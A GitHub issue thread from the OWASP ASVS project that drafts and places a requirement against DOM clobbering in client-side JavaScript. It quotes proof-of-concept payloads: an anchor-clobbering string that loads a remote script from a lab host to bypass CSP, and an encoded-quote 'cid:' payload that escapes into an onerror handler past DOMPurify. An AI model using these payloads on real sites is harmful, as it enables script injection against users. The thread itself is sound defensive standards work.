### ISSUE TITLE
15.3.8 / v5.0.be-10.4.2 DOM Clobbering

### ISSUE THREAD

**Issue by ImanSharaf** [OWASP/ASVS#1733]
I could not find an specific item that addresses the issue of DOM Clobbering. As you know, DOM Clobbering is a type of attack where attackers can redefine JavaScript global variables or native DOM elements by making use of certain HTML payloads. This can lead to various security implications, including bypassing Content Security Policies (CSP), filters or causing unexpected behavior in web applications.

With modern web applications relying heavily on JavaScript and dynamic DOM manipulations, vulnerabilities like DOM Clobbering can easily be overlooked. Including it in the ASVS will ensure that application developers, security testers, and organizations are aware of this potential risk and can take measures to prevent it.

**Comment by jmanico** [comment]
DOM clobbering does require some defense. (from ChatGPT)

Defensive Measures
1. Isolate and Scope
The first line of defense is to isolate and properly scope your variables. Use JavaScript modules or closures to limit the scope of variables, making it harder for attackers to clobber them.

javascript
Copy code
(function() {
  var username = "Jim";
  // Your code here
})();
2. Use const and let
Using const and let instead of var can also help because they are block-scoped and not function-scoped, providing a tighter scope.

javascript
Copy code
{
  const username = "Jim";
}
3. Object Freezing
You can use Object.freeze() to make an object immutable, preventing new properties from being added to it and making existing properties non-configurable.

javascript
Copy code
const secureObject = Object.freeze({ username: "Jim" });
4. Explicit Property Access
Instead of directly accessing properties, use methods that explicitly check the type of the accessed property. For example, use document.getElementById() instead of directly accessing document.username when you want to manipulate DOM elements.

**Comment by jmanico** [comment]
But really, if you are protected from XSS these attacks wont happen in the first place. Once XSS, it really is game over. I think we should just focus on XSS defense vs these kinds of special JS hardening.

**Comment by tghosth** [comment]
> But really, if you are protected from XSS these attacks wont happen in the first place. Once XSS, it really is game over. I think we should just focus on XSS defense vs these kinds of special JS hardening.

I think this is a good point, @ImanSharaf  do you have an example where DOM clobbering could occur without XSS?

**Comment by ImanSharaf** [comment]
> But really, if you are protected from XSS these attacks wont happen in the first place. Once XSS, it really is game over. I think we should just focus on XSS defense vs these kinds of special JS hardening.

@tghosth Even when an application is fortified with robust cross-site scripting (XSS) filters and a well-defined Content Security Policy (CSP), it may still remain susceptible to DOM Clobbering attacks. It's essential to recognize that attackers can exploit DOM Clobbering as a technique to circumvent the very protections offered by CSP and XSS filters. 

https://portswigger.net/research/bypassing-csp-via-dom-clobbering

**Comment by jmanico** [comment]
> Even when an application is fortified with robust cross-site 
scripting (XSS) filters and a well-defined Content Security Policy 
(CSP), it may still remain susceptible to DOM Clobbering attacks.

I agree with your call on CSP, HTML injection can evade CSP.

But HTML injection (the non-Javascript XSS-like content injection 
possibility) does not evade good output encoding and HTML sanitization 
practices.

**Comment by elarlang** [comment]
Here comes the place to point out - XSS is BS as a term, it does not say anything. Let's talk about syntax + problem there - is it injection, is it execution, in HTML or in JavaScript.

In this case, out of curiosity, what is the expected defense? What would be the requirement (additionally HTML injection (covered by current 5.3.1)?

**Comment by tghosth** [comment]
> Here comes the place to point out - XSS is BS as a term, it does not say anything ([think about this and pay attention to published date](https://blog.jeremiahgrossman.com/2006/07/origins-of-cross-site-scripting-xss.html)). Let's talk about syntax + problem there - is it injection, is it execution, in HTML or in JavaScript.

Let's not open up this holy war again LOL

> In this case, out of curiosity, what is the expected defense? What would be the requirement (additionally HTML injection (covered by current 5.3.1)?

So the defence [is covered here](https://portswigger.net/web-security/dom-based/dom-clobbering#how-to-prevent-dom-clobbering-attacks) and actually it reminds me of the "defensive coding" type of requirement that we discussed in #1617.

I think I have changed my mind here. In principle this requires XSS but the problem is that sometimes you need to render some HTML but not all HTML. When that is the case, you generally run a library like DOMPurify to remove dangerous items.

However, from a brief review, I don't think DOMPurify would prevent the following payload in [this vulnerability](https://portswigger-labs.net/dom-invader/testcases/augmented-dom-script-dom-clobbering-csp/?x=%3Ca%20id=%22ehy%22%3E%3C/a%3E%3Ca%20href=%22//subdomain1.portswigger-labs.net/xss/xss.js?%22%20name=%22codeBasePath%22%20id=%22ehy%22%3E%3C/a%3E) which is [described here](https://portswigger.net/research/bypassing-csp-via-dom-clobbering).

```html
<a id=ehy><a id=ehy name=codeBasePath href="//subdomain1.portswigger-labs.net/xss/xss.js?">
```

Specifically, I ran the HTML in the payload though DOMPurify and it did not remove anything.

As such, if a standard XSS prevention does not stop this from happening then I think we need have a specific item for it.

@cure53 @hackvertor have I understood the situation corectly?

**Comment by cure53** [comment]
Correct, by default, this would _likely_ not be prevented by DOMPurify as we only prevent clobbering if we detect actual collisions with existing stuff in the DOM. 

To give you a reliable answer, I'd need more context, i.e. what the page looks like when DOMPurify is loaded / running etc.

**Comment by elarlang** [comment]
> Let's not open up this holy war again LOL

lol and holy war? (-some filtered out lines here-). You just saw above that different people talked about "XSS" and had different understanding of it (in this example, does it cover "HTML injection" or not) and they are professionals on the field. It is a problematic term and you can not ignore or laugh over that.

Back to the issue - if there is adequate and effective defense against DOM clobbering additionally to avoid HTML injection in the first place, we should consider this as separate requirement. From only "we need to fix it only by avoiding HTML injection" point of view we don't need large part of Content-Security-Policy as well, but... we need.

**Comment by elarlang** [comment]
As I understood, the problem is in JavaScript code, how it calls some objects based on name and id's (anything else?) and the requirement should say, how to write JavaScript code correctly to avoid that.

If DOM clobbering mostly or only work on `id` and `name` attributes, then as 2nd layer of defense it is possible to use filtering them out via DOMPurify. The question - is there realistic need to have id and name attributes for elements for content, which gets cleaned up by DOMPurify?

**Comment by tghosth** [comment]
yeah I am pretty sure `id` and `name` HTML attributes are pretty generic.

**Comment by ImanSharaf** [comment]
@tghosth Also, DOMPurify permits the use of the cid: protocol, which doesn't encode double quotes in URLs. As a result, an encoded double quote can be inserted, which will then be decoded when executed.
So, [injecting something like this](https://book.hacktricks.xyz/pentesting-web/xss-cross-site-scripting/dom-clobbering):
`<a id=defaultAvatar><a id=defaultAvatar name=avatar href="cid:&quot;onerror=alert(1)//">`
will make the HTML encoded `&quot;` to be decoded on runtime and escape from the attribute value to create the onerror event.

**Comment by jmanico** [comment]
This attack does get through DomPURIFY but it does not execute in the latest Chrome. Is there a specific browser that ...

`<a href="cid:&quot;onerror=alert(1)//">CLICK ME</a>`

...will fire in?

**Comment by jmanico** [comment]
Also, DomPURIFY does not resolve the &quot; as you can see here:
![Screenshot 2023-09-28 at 2 08 33 PM](https://github.com/OWASP/ASVS/assets/531465/113939da-1b0c-45b8-a4a7-278e38e877af)

**Comment by elarlang** [comment]
HTML encoded characters are valid in HTML element attribute value - browser first decodes them and then executes. For the time they are in DOM, those are decoded.

As DOMpurify is second layer of defense for DOM clobbering, I would say the focus here is a bit in wrong place. The problem is in JavaScript code.

**Comment by jmanico** [comment]
> HTML encoded characters are valid in HTML element attribute value - browser first decodes them and then executes. For the time they are in DOM, those are decoded.
> 
> As DOMpurify is second layer of defense for DOM clobbering, I would say the focus here is a bit in wrong place. The problem is in JavaScript code.

I agree with Elar.

**Comment by hackvertor** [comment]
I think this can be fixed at the filtering level too by prefixing the name and id attributes. For example:

Input: 
<img id=x name=y>

Output:
<img id=myApp-x name=myApp-y>

Using hyphen ensures existing variable names won't be clobbered. By defining a prefix in DOM purify (currently doesn't support this) an application can be secure against most clobbering attacks. You'd probably want to protect against class clobbering too by prefixing CSS class names.

**Comment by elarlang** [comment]
But it is all more taking the likelihood and impact down, but not actually fixing the problematic code which causes it?

**Comment by hackvertor** [comment]
Well it really needs to fixed at the browser level but then you could break existing sites and you'd have to catch all variants:

```html
<a href='https://blah:&quot' id=x></a>
<script>
alert(x)
</script>
```

**Comment by tghosth** [comment]
Ok so @ImanSharaf I think there seems to be enough evidence here that this is a specific issue which needs to be addressed.

So the next question, what do you think the requirement needs to be. I think Jim mentioned some protections here https://github.com/OWASP/ASVS/issues/1733#issuecomment-1736616821 and Gareth mentioned some here https://github.com/OWASP/ASVS/issues/1733#issuecomment-1740437109 but how do we make it into a real requirement?

**Comment by ImanSharaf** [comment]
These are 8 common DOM Clobbering [patterns](https://domclob.xyz/domc_wiki/indicators/patterns.html):
![image](https://github.com/OWASP/ASVS/assets/78227895/fd13e699-3903-405e-9ab4-8f85482719a0)
 
I believe Gareth solution [#1733 (comment)](https://github.com/OWASP/ASVS/issues/1733#issuecomment-1740471786) works. 

[Here](https://domclob.xyz/domc_wiki/indicators/patterns.html#secure-patterns--guidelines) they have mentioned 4 mitigations: 
1. Explicit Variable Declarations -> could patch the patterns A, D, E, F, and H
2. Strict Type Checking -> could patch the patterns B, C and G

By having these two in place we can patch all common patterns.

Also, it seems 4. Namespace Isolation -> can patch all common patterns by itself.

**Comment by ImanSharaf** [comment]
Also, [here](https://domclob.xyz/domc_markups/list) you can test your browser to see if it is vulnerable to DOM Clobbering.

**Comment by elarlang** [comment]
Here is some nice material as well: https://portswigger.net/web-security/dom-based/dom-clobbering

**Comment by tghosth** [comment]
Ok so @ImanSharaf can you suggest the requirement text?

**Comment by ImanSharaf** [comment]
What is your opinion about this one? @tghosth 

> Ensure your application mitigates DOM clobbering by employing explicit variable declarations, strict type checking, avoiding document for global variables, and implementing namespace isolation.

**Comment by elarlang** [comment]
"Verify that the application..."

I think the requirement should mention the word JavaScript. Or is it problem somewhere else as well? .. and should we worry that JavaScript is trademark and maybe we should use ECMAScript instead?

What means "avoiding document for global variables"?

**Comment by tghosth** [comment]
I think the following incorporates @ImanSharaf's and @elarlang's points.

> **Verify that the application** mitigates DOM clobbering **in JavaScript** by employing explicit variable declarations, performing strict type checking, **avoiding storing global variables on the document object**, and implementing namespace isolation.

I am not super worried about the ASVS getting sued for trademark infringement 😄 

I think we should also include this great site as a reference:

https://domclob.xyz/domc_wiki/indicators/patterns.html#secure-patterns--guidelines

**Comment by elarlang** [comment]
Buh, here lack of Englush and lack of knowledge on the topic maybe meet, but the position of "in JavaScript" maybe need to improved. If for others it is clear and understandable, then just ignore this comment.

"mitigates DOM clobbering in JavaScript" - for me it gives feeling/understanding, that DOM clobbering happening only in JavaScript. Yes, the reason is there, but it requires DOM + JavaScript code.

Can it start with?
> Verify that the application mitigates in JavaScript against DOM clobbering by ...

and one more thing or question - as we have also nodejs and server-side javascript, should we limit it to client-side javascript?

**Comment by ImanSharaf** [comment]
> **Verify that the application** mitigates DOM clobbering **in JavaScript** by employing explicit variable declarations, performing strict type checking, **avoiding storing global variables on the document object**, and implementing namespace isolation.

I believe this works.

**Comment by tghosth** [comment]
> Verify that the application **avoids** DOM clobbering **when using client-side JavaScript** by employing explicit variable declarations, performing strict type checking, avoiding storing global variables on the document object, and implementing namespace isolation.

**Comment by elarlang** [comment]
Yes, good for me.

**Comment by tghosth** [comment]
I was actually thinking about putting it into the defensive coding section....

**Comment by tghosth** [comment]
Agree with CWE and level

**Comment by tghosth** [comment]
https://github.com/OWASP/ASVS/blob/defensive_coding/5.0/en/0x18-V10-Malicious.md#v104-defensive-coding

**Comment by elarlang** [comment]
> I was actually thinking about putting it into the defensive coding section....

ok, let's put it there

**Comment by jmanico** [comment]
Right now Dom Clobbering is listed as 

_15.3.8 | Verify that the application avoids DOM clobbering when using client-side JavaScript by employing explicit variable declarations, performing strict type checking, avoiding storing global variables on the document object, and implementing namespace isolation._

Which I think is the wrong location. I'd suggest moving it to V1.2 Injection Prevention or similar.

**Comment by elarlang** [comment]
> Which I think is the wrong location. I'd suggest moving it to V1.2 Injection Prevention or similar.

The defense for this is not encoding or escaping. I think it is in correct place.

**Comment by jmanico** [comment]
The JavaScript client defenses seem out of place for me. I'd like it moved somewhere else so it's not lost in a generic category when it's specific to client side defense.

**Comment by tghosth** [comment]
V1.2 and V1.3 certainly are not only client side defense so I don't think moving the requirement there would make much difference. 

We have the web browser based chapter in V3 but I am not sure there is a good fit for it there.

https://github.com/OWASP/ASVS/blob/master/5.0/en/0x12-V3-Web-Frontend-Security.md

 The nice thing about section V15 is that it deliberately gathers some more code level security considerations so the context should be clear.

**Comment by jmanico** [comment]
I politely disagree. I think 15.3.6 and 15.3.8 are getting lost in a mass of other unrelated requirements.

- _15.3.6	Verify that JavaScript code is written in a way that prevents prototype pollution, for example, by using Set() or Map() instead of object literals._	
- _15.3.8	Verify that the application avoids DOM clobbering when using client-side JavaScript by employing explicit variable declarations, performing strict type checking, avoiding storing global variables on the document object, and implementing namespace isolation._	

I'd like to merge them in with 3.2, currently called "Unintended Content Interpretation" and includes only 2 requirements:


- _3.2.1 Verify that security controls are in place to prevent browsers from rendering content or functionality in HTTP responses in an incorrect context (e.g., when an API, a user-uploaded file or other resource is requested directly). Possible controls could include: not serving the content unless HTTP request header fields (such as Sec-Fetch-*) indicate it is the correct context, using the sandbox directive of the Content-Security-Policy header field or using the attachment disposition type in the Content-Disposition header field.
- 3.2.2 Verify that content intended to be displayed as text, rather than rendered as HTML, is handled using safe rendering functions (such as createTextNode or textContent) to prevent unintended execution of content such as HTML or JavaScript._

These four checks all deal with protecting the browser’s handling of content and its DOM from unintended execution or tampering. In other words, they’re all about ensuring that what gets rendered in the page - and the JavaScript environment around it - can’t be hijacked or polluted by malicious inputs.

I suggest that we move them into 3.2 and rename it to "Safe Browser Rendering" or "Safe Browser Rendering & DOM Integrity Protections"

**Comment by tghosth** [comment]
Unfortunately 15.3.6 is relevant at both the server side and also the client side so we cannot move that to V3. 

For moving 15.3.8, it explicitly says client-side so @elarlang what do you think about that?

**Comment by tghosth** [comment]
> merge topic

I am pretty sure Jim's means merging the requirements into that section, not merging the requirements into themselves

> Problem to create: it is separate from other similar requirements, and then we create 2 places from which you need to look at them.

I would have thought developers need to look in both places anyway, no? I don't see a scenario where this means they need to look at 2 sections instead of 1.

**Comment by jmanico** [comment]
> > merge topic
> 
> I am pretty sure Jim means merging the requirements into that section, not merging the requirements into themselves

Exactly. These 4 requirements are very much handling the same category of defense and it's seems sensible to group them.

**Comment by elarlang** [comment]
Ok, misinterpreted the merge proposal.

As I said, I don't care too much where the requirement 15.3.8 is located, it fits to both places. It can be moved to V3.2 if there is desire and agreement to do so.

But I can not see the fit for 15.3.6 to be in that section.

> I suggest that we move them into 3.2 and rename it to "Safe Browser Rendering" or "Safe Browser Rendering & DOM Integrity Protections"

I'm quite confused from the proposed section title proposal. If we move only 15.3.8, then I prefer we keep the title as it is.

**Comment by jmanico** [comment]
My preference it to move 15.3.6 and 15.3.6 into 3.2.

_15.3.6 Verify that JavaScript code is written in a way that prevents prototype pollution, for example, by using Set() or Map() instead of object literals.
3.2.2 Verify that content intended to be displayed as text, rather than rendered as HTML, is handled using safe rendering functions (such as createTextNode or te_xtContent) to prevent unintended execution of content such as HTML or JavaScript.

These two are very related. They both address _unintended interpretation or execution of content_. Here is a breakdown of the details.

| Aspect           | `15.3.6` – Prototype Pollution                            | `3.2.2` – Safe Text Rendering                                        |
|------------------|-----------------------------------------------------------|----------------------------------------------------------------------|
| **Theme**         | Structural tampering                                      | Visual/content injection                                             |
| **Goal**          | Prevent unintended side-effects via JS inheritance        | Prevent unintended rendering or execution                           |
| **Root Cause**    | Unsafe use of objects for dynamic properties              | Unsafe rendering methods                                             |
| **Risk**          | Silent logic manipulation                                 | Visible/exploitable XSS                                              |
| **Layer**         | JavaScript runtime logic, object structure                | Browser DOM rendering and HTML parsing                              |
| **Outcome**       | Application behavior is altered globally via prototype    | Malicious content is executed rather than displayed                 |
| **Common Thread** | Untrusted input being interpreted in ways it shouldn’t    | Untrusted input being interpreted in ways it shouldn’t              |

**Comment by tghosth** [comment]
> Ok, misinterpreted the merge proposal.

It's ok, I think I misinterpreted something you wrote above as well 🙃

@jmanico regardless of the overall theme of the requirements, V3 explicitly says at the top:

> The category focuses on requirements that protect against attacks that are executed via a web frontend for an application. 

Prototype pollution is relevant at both client-side and [also server-side](https://portswigger.net/web-security/prototype-pollution/server-side) and therefore does not fit into this category.

Current summary:

- We all agree that 15.3.8 DOM Clobbering can move to section V3.2.
- @elarlang and I disagree about moving 15.3.6 prototype pollution since it is not only relevant to client-side/web frontend but also backend.

**Comment by elarlang** [comment]
Josh already quoted it, I do it as well:

V3 chapter text defines clearly:
> The category focuses on requirements that protect against attacks that are executed via a web frontend for an application. These requirements will not be relevant for machine-to-machine solutions.

Most of the requirements that apply for client side must be made on the server side, but that is not the point here. The point is, that those requirements are valid only when the _victim browser_ is involved in the attack scenario (and those requirements are not needed for example for machine-to-machine scenario).

Are any of those listed requirements needed if there is no victim browser involved in the attack scenario? 3.7.2 can technically fit.

**Comment by tghosth** [comment]
On 3.7.2, I would say that redirects are only really interesting where there are browsers...

**Comment by elarlang** [comment]
> On 3.7.2, I would say that redirects are only really interesting where there are browsers...

We have now #3040 and let's move that discussion there. Here, we should decide:
* do we move DOM globbering to V3?
* is there anything else to solve?

**Comment by jmanico** [comment]
I would like to move DOM clobbering into v3 if that works for you. I just like JavaScript requirements grouped as much as possible. 

This is not a huge deal to me, just a suggestion if you like the idea.

**Comment by elarlang** [comment]
So I accidentally configured PR to close the issue, but I think everything we have agreement here is sorted out with the PR and the rest should stay like it is, or, it should have a separate issue, because then it is not about the DOM globbering issue anymore.
